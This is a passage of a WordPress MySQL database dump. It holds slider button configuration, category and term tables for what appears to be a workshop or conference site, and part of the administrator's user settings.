NOW\",\"alias\":\"Button\",\"uid\":25,\"customCSS\":\"outline:none;\\nbox-shadow:none;\\nbox-sizing:border-box;\\n-moz-box-sizing:border-box;\\n-webkit-box-sizing:border-box;\",\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"267px\",\"e\":true},\"n\":{\"v\":\"267px\"},\"t\":{\"v\":\"267px\"},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"200px\",\"e\":true},\"n\":{\"v\":\"200px\"},\"t\":{\"v\":\"200px\"},\"m\":{\"v\":\"190px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"position\":\"relative\",\"zIndex\":17},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":1500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":1490,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true},\"n\":{\"v\":\"rgba(255,255,255,1)\"},\"t\":{\"v\":\"rgba(255,255,255,1)\"},\"m\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":true}},\"padding\":{\"d\":{\"v\":[16,40,16,40],\"e\":true},\"n\":{\"v\":[16,40,16,40],\"e\":false},\"t\":{\"v\":[16,40,16,40],\"e\":false},\"m\":{\"v\":[16,40,16,40],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"v\":\"18px\",\"e\":true},\"n\":{\"v\":\"18px\"},\"t\":{\"v\":\"18px\"},\"m\":{\"v\":\"24px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"34px\",\"e\":true},\"n\":{\"v\":\"34px\"},\"t\":{\"v\":\"34px\"},\"m\":{\"v\":\"34px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"cursor\":\"pointer\",\"backgroundColor\":\"{&type&:&linear&,&angle&:&135&,&colors&:[{&r&:49,&g&:244,&b&:247,&a&:1,&position&:0,&align&:&top&},{&r&:49,&g&:244,&b&:247,&a&:1,&position&:0,&align&:&bottom&},{&r&:3,&g&:102,&b&:160,&a&:1,&position&:53,&align&:&bottom&},{&r&:30,&g&:197,&b&:234,&a&:1,&position&:100,&align&:&bottom&},{&r&:30,&g&:197,&b&:234,&a&:1,&position&:100,&align&:&top&}],&easing&:&none&,&strength&:100}\",\"borderColor\":\"rgba(0,0,0,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true},\"n\":{\"v\":\"rgba(255,255,255,1)\"},\"t\":{\"v\":\"rgba(255,255,255,1)\"},\"m\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true}}}},\"hover\":{\"usehover\":true,\"color\":\"rgba(255,255,255,1)\",\"backgroundColor\":\"{&type&:&linear&,&angle&:&225&,&colors&:[{&r&:130,&g&:35,&b&:172,&a&:&1&,&position&:0,&align&:&top&},{&r&:130,&g&:35,&b&:172,&a&:&1&,&position&:0,&align&:&bottom&},{&r&:187,&g&:5,&b&:129,&a&:&1&,&position&:53,&align&:&bottom&},{&r&:233,&g&:77,&b&:66,&a&:&1&,&position&:100,&align&:&bottom&},{&r&:233,&g&:77,&b&:66,&a&:&1&,&position&:100,&align&:&top&}]}\",\"borderColor\":\"rgba(0,0,0,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":\"solid\",\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":\"50\",\"originY\":\"50\",\"speed\":\"400\",\"svg\":{\"color\":\"rgba(255,255,255,1)\"}},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"\\/software-company\\/who-we-are\\/\",\"link_open_in\":\"_self\",\"link_follow\":\"follow\",\"jump_to_slide\":12,\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5}}}','{\"version\":\"6.5.19\"}');
/*!40000 ALTER TABLE `dnctiavkr_revslider_static_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_static_slides_bkp`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_static_slides_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_static_slides_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_static_slides_bkp`
--

LOCK TABLES `dnctiavkr_revslider_static_slides_bkp` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_static_slides_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_static_slides_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_term_relationships`
--

DROP TABLE IF EXISTS `dnctiavkr_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_term_relationships`
--

LOCK TABLES `dnctiavkr_term_relationships` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_term_relationships` DISABLE KEYS */;
INSERT INTO `dnctiavkr_term_relationships` VALUES
(25,2,0),
(2079,11,0),
(2080,11,0),
(2081,11,0),
(2082,9,0),
(2083,9,0),
(2084,9,0),
(2095,16,0),
(2151,10,0),
(2152,10,0),
(2153,10,0),
(2281,9,0),
(2282,9,0),
(2283,9,0),
(2284,9,0),
(2285,9,0),
(2286,9,0),
(2346,9,0),
(2348,9,0),
(2349,9,0),
(2350,9,0),
(2351,9,0),
(2352,9,0),
(2353,9,0),
(2354,9,0),
(2355,9,0),
(2356,9,0),
(2357,9,0),
(2358,9,0),
(2359,9,0),
(2487,22,0),
(2487,35,0),
(2495,22,0),
(2495,35,0),
(2495,48,0),
(2498,22,0),
(2500,22,0),
(2503,22,0),
(2521,23,0),
(2523,23,0),
(2523,24,0),
(2525,23,0),
(2527,24,0),
(2531,25,0),
(2535,25,0),
(2537,25,0),
(2537,26,0),
(2537,58,0),
(2539,26,0),
(2541,27,0),
(2543,27,0),
(2545,28,0),
(2547,28,0),
(2549,28,0),
(2570,16,0),
(2572,16,0),
(2574,16,0),
(2577,16,0),
(2580,16,0),
(2586,16,0),
(2599,29,0),
(2601,30,0),
(2603,30,0),
(2605,30,0),
(2607,31,0),
(2697,16,0),
(2705,32,0),
(2705,35,0),
(2707,32,0),
(2709,32,0),
(2712,16,0),
(2717,33,0),
(2719,33,0),
(2721,33,0),
(2723,33,0),
(2736,16,0),
(2745,34,0),
(2747,34,0),
(2749,34,0),
(2751,34,0),
(2768,16,0),
(2785,16,0),
(2791,16,0),
(2795,16,0),
(2798,16,0),
(2808,35,0),
(2810,35,0),
(2818,36,0),
(2820,36,0),
(2822,36,0),
(2824,36,0),
(2826,36,0),
(2828,36,0),
(2828,39,0),
(2835,37,0),
(2837,37,0),
(2839,37,0),
(2847,38,0),
(2849,38,0),
(2851,38,0),
(2856,16,0),
(2862,40,0),
(2864,40,0),
(2872,27,0),
(2874,27,0),
(2904,9,0),
(2921,9,0),
(2946,41,0),
(2949,16,0),
(2959,41,0),
(2961,41,0),
(2963,41,0),
(2965,41,0),
(2972,42,0),
(2974,42,0),
(2976,42,0),
(2978,42,0),
(2980,42,0),
(2982,42,0),
(2984,42,0),
(2987,42,0),
(2989,43,0),
(2991,43,0),
(2993,16,0),
(2996,16,0),
(3025,44,0),
(3027,44,0),
(3029,44,0),
(3031,45,0),
(3033,45,0),
(3035,45,0),
(3037,45,0),
(3039,45,0),
(3041,45,0),
(3043,45,0),
(3045,45,0),
(3047,45,0),
(3049,16,0),
(3262,46,0),
(3264,46,0),
(3266,16,0),
(3334,16,0),
(3337,47,0),
(3339,47,0),
(3341,47,0),
(3343,47,0),
(3345,47,0),
(3347,47,0),
(3386,16,0),
(3389,48,0),
(3391,48,0),
(3393,48,0),
(3427,16,0),
(3431,49,0),
(3433,49,0),
(3434,49,0),
(3449,16,0),
(3452,16,0),
(3455,50,0),
(3456,50,0),
(3458,51,0),
(3460,51,0),
(3462,51,0),
(3497,16,0),
(3502,52,0),
(3504,52,0),
(3506,52,0),
(3508,52,0),
(3510,52,0),
(3556,9,0),
(3559,53,0),
(3577,53,0),
(3581,53,0),
(3583,53,0),
(3585,53,0),
(3587,53,0),
(3589,53,0),
(3591,53,0),
(3593,53,0),
(3595,53,0),
(3597,53,0),
(3599,53,0),
(3601,53,0),
(3606,54,0),
(3610,53,0),
(3613,16,0),
(3632,55,0),
(3634,55,0),
(3637,55,0),
(3639,55,0),
(3641,55,0),
(3643,55,0),
(3645,9,0),
(3671,9,0),
(3681,56,0),
(3688,57,0),
(3693,57,0),
(3696,57,0),
(3698,57,0),
(3701,56,0),
(3709,56,0),
(3715,59,0),
(3855,16,0),
(3863,60,0),
(3865,60,0),
(3867,60,0),
(3872,54,0),
(3872,94,0),
(3874,54,0),
(3876,53,0),
(3897,16,0),
(3904,61,0),
(3910,61,0),
(3912,61,0),
(3914,61,0),
(3916,61,0),
(3918,61,0),
(3928,54,0),
(3943,53,0),
(3948,62,0),
(3950,62,0),
(3952,53,0),
(3954,62,0),
(3955,62,0),
(3957,53,0),
(4010,56,0),
(4024,62,0),
(4027,62,0),
(4029,62,0),
(4071,62,0),
(4073,62,0),
(4075,62,0),
(4077,54,0),
(4081,62,0),
(4083,62,0),
(4578,91,0),
(4582,91,0),
(4583,91,0),
(4611,62,0),
(4629,62,0),
(4631,62,0),
(4633,62,0),
(4659,92,0),
(4660,92,0),
(4661,92,0),
(4852,9,0),
(4971,91,0),
(5117,9,0),
(5118,9,0),
(5119,9,0),
(5120,9,0),
(5122,1,0),
(5132,1,0),
(5139,1,0),
(5364,1,0),
(5383,1,0),
(5402,9,0),
(5417,1,0),
(5430,1,0),
(5437,9,0),
(5448,9,0),
(5460,9,0),
(5468,54,0),
(5476,9,0),
(5477,9,0),
(5481,9,0);
/*!40000 ALTER TABLE `dnctiavkr_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_term_taxonomy`
--

DROP TABLE IF EXISTS `dnctiavkr_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=95 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_term_taxonomy`
--

LOCK TABLES `dnctiavkr_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_term_taxonomy` DISABLE KEYS */;
INSERT INTO `dnctiavkr_term_taxonomy` VALUES
(1,1,'category','',0,7),
(2,2,'wp_theme','',0,1),
(9,5,'nav_menu','',0,39),
(10,6,'nav_menu','',0,3),
(11,4,'nav_menu','',0,3),
(14,31,'category','',0,0),
(15,32,'category','',0,0),
(16,14,'dt_portfolio_category','',0,29),
(18,13,'dt_portfolio_category','',0,0),
(19,11,'nav_menu','',0,0),
(20,33,'post_format','',0,0),
(21,34,'category','',0,0),
(22,35,'dt_team_category','',0,5),
(23,36,'dt_team_category','',0,3),
(24,37,'dt_team_category','',0,2),
(25,38,'dt_team_category','',0,3),
(26,39,'dt_team_category','',0,2),
(27,40,'dt_team_category','',0,4),
(28,41,'dt_team_category','',0,3),
(29,42,'dt_team_category','',0,1),
(30,43,'dt_team_category','',0,3),
(31,44,'dt_team_category','',0,1),
(32,45,'dt_team_category','',0,3),
(33,46,'dt_team_category','',0,4),
(34,47,'dt_team_category','',0,4),
(35,48,'dt_team_category','',0,5),
(36,49,'dt_team_category','',0,6),
(37,50,'dt_team_category','',0,3),
(38,51,'dt_team_category','',0,3),
(39,52,'dt_team_category','',0,1),
(40,53,'dt_team_category','',0,2),
(41,54,'dt_team_category','',0,5),
(42,55,'dt_team_category','',0,8),
(43,56,'dt_team_category','',0,2),
(44,57,'dt_team_category','',0,3),
(45,58,'dt_team_category','',0,9),
(46,59,'dt_team_category','',0,2),
(47,60,'dt_team_category','',0,6),
(48,61,'dt_team_category','',0,4),
(49,62,'dt_team_category','',0,3),
(50,63,'dt_team_category','',0,2),
(51,64,'dt_team_category','',0,3),
(52,65,'dt_team_category','',0,5),
(53,66,'dt_team_category','',0,18),
(54,67,'dt_team_category','',0,6),
(55,68,'dt_team_category','',0,6),
(56,69,'dt_portfolio_category','',0,4),
(57,70,'dt_team_category','',0,4),
(58,71,'dt_team_category','',0,1),
(59,72,'dt_team_category','',0,1),
(60,73,'dt_team_category','',0,3),
(61,74,'dt_team_category','',0,6),
(62,75,'dt_team_category','',0,16),
(91,104,'dt_team_category','',0,4),
(92,105,'dt_team_category','',0,3),
(93,106,'category','',0,0),
(94,107,'dt_team_category','',0,1);
/*!40000 ALTER TABLE `dnctiavkr_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_termmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_termmeta`
--

LOCK TABLES `dnctiavkr_termmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_termmeta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_termmeta` VALUES
(7,5,'_the7_imported_item','old-landing'),
(8,6,'_the7_imported_item','old-landing'),
(9,4,'_the7_imported_item','old-landing'),
(12,31,'_the7_imported_item','software-company'),
(13,32,'_the7_imported_item','software-company'),
(14,14,'_the7_imported_item','software-company'),
(16,13,'_the7_imported_item','software-company'),
(17,11,'_the7_imported_item','software-company'),
(18,34,'the7_fancy_bg_color','#'),
(19,34,'the7_fancy_text_color','#'),
(20,106,'the7_fancy_bg_color','#'),
(21,106,'the7_fancy_text_color','#');
/*!40000 ALTER TABLE `dnctiavkr_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_terms`
--

DROP TABLE IF EXISTS `dnctiavkr_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=108 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_terms`
--

LOCK TABLES `dnctiavkr_terms` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_terms` DISABLE KEYS */;
INSERT INTO `dnctiavkr_terms` VALUES
(1,'Uncategorized','uncategorized',0),
(2,'dt-the7','dt-the7',0),
(4,'Previously used menu 3','previously-used-menu-3',0),
(5,'main menu','main-menu',0),
(6,'Previously used menu 2','previously-used-menu-2',0),
(11,'Services','services',0),
(13,'workshops-cat2','workshops-cat2',0),
(14,'workshop','workshop',0),
(31,'Media','media',0),
(32,'Other','other',0),
(33,'Gallery','gallery',0),
(34,'ws1','ws1',0),
(35,'ws1','ws1',0),
(36,'ws2','ws2',0),
(37,'ws3','ws3',0),
(38,'ws4','ws4',0),
(39,'ws5','ws5',0),
(40,'ws6','ws6',0),
(41,'ws7','ws7',0),
(42,'ws8','ws8',0),
(43,'ws8co','ws8co',0),
(44,'ws8s','ws8s',0),
(45,'ws9','ws9',0),
(46,'ws10','ws10',0),
(47,'w11','w11',0),
(48,'w12','w12',0),
(49,'w13','w13',0),
(50,'w14','w14',0),
(51,'w15','w15',0),
(52,'w13s','w13s',0),
(53,'w16','w16',0),
(54,'w17','w17',0),
(55,'w18','w18',0),
(56,'w19','w19',0),
(57,'ws20','ws20',0),
(58,'ws20s','ws20s',0),
(59,'w21','w21',0),
(60,'w22','w22',0),
(61,'w23','w23',0),
(62,'w24','w24',0),
(63,'w25','w25',0),
(64,'w26','w26',0),
(65,'w27','w27',0),
(66,'loc1','loc1',0),
(67,'int1','int1',0),
(68,'youth','youth',0),
(69,'Tutorial','tutorial',0),
(70,'tut1','tut1',0),
(71,'tut2','tut2',0),
(72,'tut3','tut3',0),
(73,'w28','w28',0),
(74,'w29','w29',0),
(75,'aast_team_s','aast_team_s',0),
(104,'Keynotes','keynotes',0),
(105,'ho','ho',0),
(106,'Dr. Alaa Abdelbary','dr-alaa-abdelbary',0),
(107,'tut44','tut44',0);
/*!40000 ALTER TABLE `dnctiavkr_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_user_registration_sessions`
--

DROP TABLE IF EXISTS `dnctiavkr_user_registration_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_user_registration_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) NOT NULL,
  `session_value` longtext NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_key`),
  UNIQUE KEY `session_id` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_user_registration_sessions`
--

LOCK TABLES `dnctiavkr_user_registration_sessions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_user_registration_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_user_registration_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_usermeta`
--

DROP TABLE IF EXISTS `dnctiavkr_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=135 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_usermeta`
--

LOCK TABLES `dnctiavkr_usermeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_usermeta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_usermeta` VALUES
(1,1,'nickname','admin_gsw23'),
(2,1,'first_name',''),
(3,1,'last_name',''),
(4,1,'description',''),
(5,1,'rich_editing','true'),
(6,1,'syntax_highlighting','true'),
(7,1,'comment_shortcuts','false'),
(8,1,'admin_color','fresh'),
(9,1,'use_ssl','0'),
(10,1,'show_admin_bar_front','true'),
(11,1,'locale',''),
(12,1,'dnctiavkr_capabilities','a:7:{s:13:\"administrator\";b:1;s:14:\"frm_view_forms\";b:1;s:14:\"frm_edit_forms\";b:1;s:16:\"frm_delete_forms\";b:1;s:19:\"frm_change_settings\";b:1;s:16:\"frm_view_entries\";b:1;s:18:\"frm_delete_entries\";b:1;}'),
(13,1,'dnctiavkr_user_level','10'),
(14,1,'dismissed_wp_pointers','vc_pointers_backend_editor,vc_grid_item,vc_pointers_frontend_editor,theme_editor_notice,plugin_editor_notice,pksn1'),
(15,1,'show_welcome_panel','1'),
(17,1,'dnctiavkr_dashboard_quick_press_last_post_id','5482'),
(18,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"142.247.168.0\";}'),
(19,1,'closedpostboxes_','a:0:{}'),
(20,1,'metaboxhidden_','a:14:{i:0;s:25:\"slider_revolution_metabox\";i:1;s:21:\"dt_page_box-microsite\";i:2;s:17:\"dt_page_box-menus\";i:3;s:19:\"dt_page_box-sidebar\";i:4;s:18:\"dt_page_box-footer\";i:5;s:33:\"dt_page_box-page_vertical_margins\";i:6;s:32:\"dt_page_box-mobile_page_paddings\";i:7;s:26:\"the7-post-meta-presets-box\";i:8;s:12:\"wpb_wpbakery\";i:9;s:26:\"dt_page_box-header_options\";i:10;s:29:\"dt_page_box-slideshow_options\";i:11;s:32:\"dt_page_box-fancy_header_options\";i:12;s:24:\"dt_page_box-post_options\";i:13;s:26:\"dt_page_box-microsite_logo\";}'),
(21,1,'dnctiavkr_user-settings','edit_element_vcUIPanelWidth=826&edit_element_vcUIPanelLeft=544px&edit_element_vcUIPanelTop=155px&editor=html&libraryContent=browse&post_settings_vcUIPanelWidth=650&post_settings_vcUIPanelLeft=960px&post_settings_vcUIPanelTop=74px&hidetb=1&advImgDetails=show&imgsize=full&uploader=1&galcols=3'),
(22,1,'dnctiavkr_user-settings-time','1694430225'),
(23,1,'elementor_admin_notices','a:1:{s:20:\"experiment_promotion\";s:4:\"true\";}'),
(24,1,'nav_menu_recently_edited','5'),
(25,1,'managenav-menuscolumnshidden','a:4:{i:0;s:15:\"title-attribute\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),
(26,1,'metaboxhidden_nav-menus','a:7:{i:0;s:28:\"add-post-type-e-landing-page\";i:2;s:26:\"add-post-type-dt_portfolio\";i:3;s:21:\"add-post-type-dt_team\";i:4;s:12:\"add-post_tag\";i:5;s:25:\"add-dt_portfolio_category\";i:6;s:21:\"add-dt_portfolio_tags\";i:7;s:20:\"add-dt_team_category\";}'),
(27,1,'closedpostboxes_page','a:1:{i:0;s:12:\"wpb_wpbakery\";}'),
(28,1,'metaboxhidden_page','a:20:{i:0;s:21:\"dt_page_box-microsite\";i:1;s:26:\"dt_page_box-display_albums\";i:2;s:26:\"dt_page_box-albums_options\";i:3;s:32:\"dt_page_box-display_albums_media\";i:4;s:25:\"dt_page_box-media_options\";i:5;s:32:\"dt_page_box-display_testimonials\";i:6;s:32:\"dt_page_box-testimonials_options\";i:7;s:12:\"wpb_wpbakery\";i:8;s:29:\"dt_page_box-slideshow_options\";i:9;s:24:\"dt_page_box-page_content\";i:10;s:24:\"dt_page_box-display_blog\";i:11;s:24:\"dt_page_box-blog_options\";i:12;s:29:\"dt_page_box-display_portfolio\";i:13;s:29:\"dt_page_box-portfolio_options\";i:14;s:24:\"dt_page_box-display_team\";i:15;s:24:\"dt_page_box-team_options\";i:16;s:10:\"postcustom\";i:17;s:16:\"commentstatusdiv\";i:18;s:9:\"authordiv\";i:19;s:26:\"dt_page_box-microsite_logo\";}'),
(29,1,'give_is_donation_forms_menu_updated','1'),
(30,1,'closedpostboxes_vc_grid_item','a:0:{}'),
(31,1,'meta-box-order_vc_grid_item','a:3:{s:4:\"side\";s:35:\"submitdiv,slider_revolution_metabox\";s:6:\"normal\";s:20:\"wpb_wpbakery,slugdiv\";s:8:\"advanced\";s:0:\"\";}'),
(32,1,'screen_layout_vc_grid_item','1'),
(33,1,'metaboxhidden_vc_grid_item','a:2:{i:0;s:12:\"wpb_wpbakery\";i:1;s:7:\"slugdiv\";}'),
(34,1,'closedpostboxes_attachment','a:0:{}'),
(35,1,'metaboxhidden_attachment','a:4:{i:0;s:16:\"commentstatusdiv\";i:1;s:11:\"commentsdiv\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";}'),
(36,1,'closedpostboxes_post','a:0:{}'),
